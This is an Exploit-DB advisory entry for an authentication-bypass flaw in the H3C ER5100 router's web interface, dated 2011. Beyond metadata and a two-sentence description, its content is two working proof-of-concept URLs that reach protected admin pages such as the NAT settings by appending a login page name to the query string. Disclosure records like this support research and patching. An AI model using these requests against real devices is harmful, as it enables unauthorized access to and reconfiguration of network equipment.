H3C ER5100 - Authentication Bypass

EDB-ID:

35872

CVE:

N/A


Author:

128bit

Type:

webapps


Platform:

ASP

Date:

2011-06-22


source: https://www.securityfocus.com/bid/48384/info

The H3C ER5100 is prone to a remote authentication-bypass vulnerability.

Attackers can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. 

http://www.example.com:8080/home.asp?userLogin.asp
http://www.example.com:8080/wan_NAT.asp?userLogin.asp